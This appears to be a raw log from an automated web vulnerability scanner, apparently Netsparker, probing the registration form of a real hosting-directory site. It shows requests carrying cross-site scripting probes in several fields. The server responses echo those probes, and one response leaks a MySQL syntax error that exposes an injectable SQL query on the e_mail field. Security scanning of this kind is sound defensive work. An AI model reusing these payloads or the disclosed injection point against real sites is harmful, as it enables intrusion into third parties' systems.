POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 560 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CDF)%3c%2fscript%3e&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 333 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001cdf)</script>'' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''"--></style></script><script>netsparker(0x001cdf)</script>'
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
'"--></style></script><script>alert(0x001CE0)</script>
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE0)%3c%2fscript%3e&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE3560737FF910612CB34B5DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560733D430B89B505B7896F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073210F28D233B6C8D2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE35607308122366D9EDDA89C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073D281AF1C53F5B0876F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E47460418D3E5008C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE35607312A81DF406D44B61C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073C525378FDC0F701E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073ED2C5D79D1366106C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073E3E4D3F2544FAC396F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE356073344DFDF5D771D7A9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073FCE5446CB7027EA1C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE356073BBF64FF25F0D4D67C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073DBFE8EF38A1217EAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560739CF2B153DDA8FB2BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073CD00CC4375A49874C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE35607358FB2C501E9D5A346F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE35607395274B09727AFBB86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073F0DA46BF0B53D46E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
'"--></style></script><script>alert(0x001CE1)</script>
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 579 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CE1)%3c%2fscript%3e&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073824055B018548D20C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE356073A6F0D249EB39E26D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE35607361E67A86CE5946B5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE3560730AC52E4392916416C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073D800B7AF8D66BAF06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073E414B3C817CDCD62C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE35607375DEFB6F3F3862FEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073A806918CEEDD134A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073A6BF090D3691DFF9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073FE6F935A5BCF4AD56F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='325A5101EE3560738F6D7A93301AFDA5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073D43CFF6E8A3FC63FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE3560730240EBB49A922D02C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073275EEC00AE0100F2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE35607322757DE9B9604EE5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073A55563E1CE7B9F49C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073B6E18F6EB92B982C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE3560738EA57356AC28348E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE35607360D4215F621F68A76F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img 